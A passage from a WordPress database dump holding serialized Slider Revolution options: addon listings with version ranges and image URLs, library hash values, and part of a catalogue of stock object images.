use?\";s:4:\"sort\";s:3:\"300\";s:11:\"last_update\";s:10:\"2022-02-19\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:79:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_domainswitch.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"DS\";}}s:23:\"revslider-refresh-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"415\";s:9:\"releaseid\";s:2:\"10\";s:4:\"slug\";s:23:\"revslider-refresh-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"(Re)Load\";s:6:\"line_1\";s:39:\"Reload the current page or a custom URL\";s:6:\"line_2\";s:34:\"after a certain time, loops, slide\";s:9:\"available\";s:5:\"3.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"330\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_reload.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RF\";}}s:25:\"revslider-rel-posts-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"55\";s:9:\"releaseid\";s:1:\"9\";s:4:\"slug\";s:25:\"revslider-rel-posts-addon\";s:12:\"version_from\";s:7:\"5.2.4.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Related Posts\";s:6:\"line_1\";s:25:\"Add related Posts Sliders\";s:6:\"line_2\";s:31:\"at the end of your post content\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"340\";s:11:\"last_update\";s:10:\"2023-06-12\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wprelated.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RP\";}}s:20:\"revslider-snow-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"399\";s:9:\"releaseid\";s:1:\"6\";s:4:\"slug\";s:20:\"revslider-snow-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Holiday Snow\";s:6:\"line_1\";s:12:\"Let it snow!\";s:6:\"line_2\";s:32:\"Add animated snow to any Slider \";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"380\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:71:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_snow.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SN\";}}s:23:\"revslider-gallery-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"378\";s:9:\"releaseid\";s:1:\"2\";s:4:\"slug\";s:23:\"revslider-gallery-addon\";s:12:\"version_from\";s:6:\"6.4.11\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"WordPress Gallery\";s:6:\"line_1\";s:31:\"Replace the standard WP Gallery\";s:6:\"line_2\";s:31:\"with the Sliders of your choice\";s:9:\"available\";s:5:\"2.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"430\";s:11:\"last_update\";s:10:\"2022-01-31\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wpgallery.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"GA\";}}s:22:\"revslider-backup-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"53\";s:9:\"releaseid\";s:1:\"3\";s:4:\"slug\";s:22:\"revslider-backup-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Backup\";s:6:\"line_1\";s:12:\"Make Backups\";s:6:\"line_2\";s:25:\"Revisions for your safety\";s:9:\"available\";s:5:\"2.0.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:4:\"sort\";s:3:\"500\";s:11:\"last_update\";s:10:\"2023-05-31\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_backup.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BU\";}}s:19:\"revslider-404-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"62\";s:9:\"releaseid\";s:1:\"8\";s:4:\"slug\";s:19:\"revslider-404-addon\";s:12:\"version_from\";s:3:\"5.3\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:3:\"404\";s:6:\"line_1\";s:39:\"Build custom 404 \"Page not Found\" Pages\";s:6:\"line_2\";s:28:\"with Slider Revolution swag!\";s:9:\"available\";s:5:\"2.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"620\";s:11:\"last_update\";s:10:\"2022-12-04\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:70:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_404.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"404\";}}s:30:\"revslider-prevnext-posts-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:2:\"63\";s:9:\"releaseid\";s:1:\"9\";s:4:\"slug\";s:30:\"revslider-prevnext-posts-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Adjacent Posts\";s:6:\"line_1\";s:30:\"Display previous and next post\";s:6:\"line_2\";s:28:\"to the currently showing one\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"630\";s:11:\"last_update\";s:10:\"2023-08-04\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wpadjacent.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:21:\"revslider-login-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"388\";s:9:\"releaseid\";s:2:\"11\";s:4:\"slug\";s:21:\"revslider-login-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Login Page\";s:6:\"line_1\";s:25:\"Very simple WP Login Page\";s:6:\"line_2\";s:34:\"enhanced with your favorite slider\";s:9:\"available\";s:5:\"3.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"650\";s:11:\"last_update\";s:10:\"2023-06-12\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:72:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_login.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LI\";}}s:24:\"revslider-featured-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"379\";s:9:\"releaseid\";s:2:\"12\";s:4:\"slug\";s:24:\"revslider-featured-addon\";s:12:\"version_from\";s:6:\"6.4.11\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:20:\"Post Featured Slider\";s:6:\"line_1\";s:25:\"Display a featured Slider\";s:6:\"line_2\";s:41:\"instead of a featured Image in your Posts\";s:9:\"available\";s:5:\"2.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"660\";s:11:\"last_update\";s:10:\"2023-05-31\";s:6:\"global\";b:1;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_wpfeatured.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FT\";}}s:23:\"revslider-weather-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"402\";s:9:\"releaseid\";s:2:\"16\";s:4:\"slug\";s:23:\"revslider-weather-addon\";s:12:\"version_from\";s:5:\"6.5.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Weather\";s:6:\"line_1\";s:21:\"Every where you go...\";s:6:\"line_2\";s:36:\"...always take the weather with you!\";s:9:\"available\";s:5:\"3.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:4:\"sort\";s:3:\"690\";s:11:\"last_update\";s:10:\"2023-05-31\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_weather.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WT\";}}s:30:\"revslider-duotonefilters-addon\";O:8:\"stdClass\":16:{s:2:\"id\";s:3:\"406\";s:9:\"releaseid\";s:2:\"18\";s:4:\"slug\";s:30:\"revslider-duotonefilters-addon\";s:12:\"version_from\";s:5:\"6.5.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Duotone\";s:6:\"line_1\";s:7:\"Duotone\";s:6:\"line_2\";s:25:\"Because one is not enough\";s:9:\"available\";s:5:\"3.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:4:\"sort\";s:3:\"710\";s:11:\"last_update\";s:10:\"2023-01-09\";s:6:\"global\";b:0;s:7:\"premium\";s:7:\"premium\";s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-b.tools/revslider/addons/images/addon_duotone.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"DTF\";}}}','yes'),
(797,'revslider-library-check','1697108073','yes'),
(798,'revslider-library-hash','dae3de1eb57eeeee008b70e9a23844b5','yes'),
(799,'rs-library','a:3:{s:4:\"hash\";s:32:\"dae3de1eb57eeeee008b70e9a23844b5\";s:7:\"objects\";a:417:{i:0;a:12:{s:2:\"id\";s:3:\"198\";s:6:\"handle\";s:16:\"object_dvd_1.png\";s:4:\"name\";s:3:\"DVD\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-10-17 12:43:17\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:1;a:12:{s:2:\"id\";s:3:\"188\";s:6:\"handle\";s:18:\"object_plant_1.png\";s:4:\"name\";s:7:\"Plant 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:2;a:12:{s:2:\"id\";s:3:\"187\";s:6:\"handle\";s:16:\"object_pen_1.png\";s:4:\"name\";s:5:\"Pen 1\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:3;a:12:{s:2:\"id\";s:3:\"172\";s:6:\"handle\";s:16:\"object_egg_1.png\";s:4:\"name\";s:3:\"Egg\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:4;a:12:{s:2:\"id\";s:3:\"171\";s:6:\"handle\";s:19:\"object_guitar_1.png\";s:4:\"name\";s:6:\"Guitar\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:5;a:12:{s:2:\"id\";s:3:\"170\";s:6:\"handle\";s:21:\"object_envelope_1.png\";s:4:\"name\";s:15:\"Closed Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:6;a:12:{s:2:\"id\";s:3:\"169\";s:6:\"handle\";s:19:\"object_postit_2.png\";s:4:\"name\";s:18:\"Postit Label White\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:7;a:12:{s:2:\"id\";s:3:\"168\";s:6:\"handle\";s:21:\"object_envelope_2.png\";s:4:\"name\";s:13:\"Open Envelope\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:8;a:12:{s:2:\"id\";s:3:\"167\";s:6:\"handle\";s:17:\"object_eggs_1.png\";s:4:\"name\";s:10:\"Egg Carton\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:9;a:12:{s:2:\"id\";s:3:\"166\";s:6:\"handle\";s:25:\"object_bottleopener_1.png\";s:4:\"name\";s:13:\"Bottle Opener\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:10;a:12:{s:2:\"id\";s:3:\"165\";s:6:\"handle\";s:23:\"object_blueprints_1.png\";s:4:\"name\";s:10:\"Blueprints\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:11;a:12:{s:2:\"id\";s:3:\"164\";s:6:\"handle\";s:22:\"object_holepunch_1.png\";s:4:\"name\";s:10:\"Hole punch\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:12;a:12:{s:2:\"id\";s:3:\"163\";s:6:\"handle\";s:20:\"object_speaker_1.png\";s:4:\"name\";s:13:\"Black Speaker\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:13;a:12:{s:2:\"id\";s:3:\"162\";s:6:\"handle\";s:19:\"object_eraser_1.png\";s:4:\"name\";s:6:\"Eraser\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"500\";s:6:\"height\";s:3:\"500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:14;a:12:{s:2:\"id\";s:3:\"161\";s:6:\"handle\";s:23:\"object_vinylcover_1.png\";s:4:\"name\";s:11:\"Vinyl Cover\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:15;a:12:{s:2:\"id\";s:3:\"160\";s:6:\"handle\";s:20:\"object_booklet_1.png\";s:4:\"name\";s:9:\"Booklet 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:16;a:12:{s:2:\"id\";s:3:\"159\";s:6:\"handle\";s:22:\"object_earphones_2.png\";s:4:\"name\";s:11:\"Earphones 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:17;a:12:{s:2:\"id\";s:3:\"158\";s:6:\"handle\";s:18:\"object_vinyl_1.png\";s:4:\"name\";s:5:\"Vinyl\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:18;a:12:{s:2:\"id\";s:3:\"157\";s:6:\"handle\";s:19:\"object_postit_1.png\";s:4:\"name\";s:17:\"Postit Label Pink\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:19;a:12:{s:2:\"id\";s:3:\"156\";s:6:\"handle\";s:23:\"object_mechpencil_1.png\";s:4:\"name\";s:17:\"Mechanical Pencil\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:20;a:12:{s:2:\"id\";s:3:\"155\";s:6:\"handle\";s:22:\"object_turntable_1.png\";s:4:\"name\";s:9:\"Turntable\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:21;a:12:{s:2:\"id\";s:3:\"154\";s:6:\"handle\";s:19:\"object_folder_2.png\";s:4:\"name\";s:19:\"Closed Folder Black\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:22;a:12:{s:2:\"id\";s:3:\"153\";s:6:\"handle\";s:19:\"object_postit_4.png\";s:4:\"name\";s:18:\"Postit Label Green\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"900\";s:6:\"height\";s:3:\"900\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:23;a:12:{s:2:\"id\";s:3:\"152\";s:6:\"handle\";s:19:\"object_folder_1.png\";s:4:\"name\";s:12:\"Blank Folder\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:24;a:12:{s:2:\"id\";s:3:\"151\";s:6:\"handle\";s:19:\"object_pencup_1.png\";s:4:\"name\";s:7:\"Pen Cup\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:25;a:12:{s:2:\"id\";s:3:\"150\";s:6:\"handle\";s:23:\"object_winebottle_1.png\";s:4:\"name\";s:15:\"Red Wine Bottle\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:26;a:12:{s:2:\"id\";s:3:\"149\";s:6:\"handle\";s:23:\"object_headphones_1.png\";s:4:\"name\";s:10:\"Headphones\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 15:34:49\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:27;a:12:{s:2:\"id\";s:3:\"148\";s:6:\"handle\";s:22:\"object_earphones_1.png\";s:4:\"name\";s:9:\"Earphones\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-18 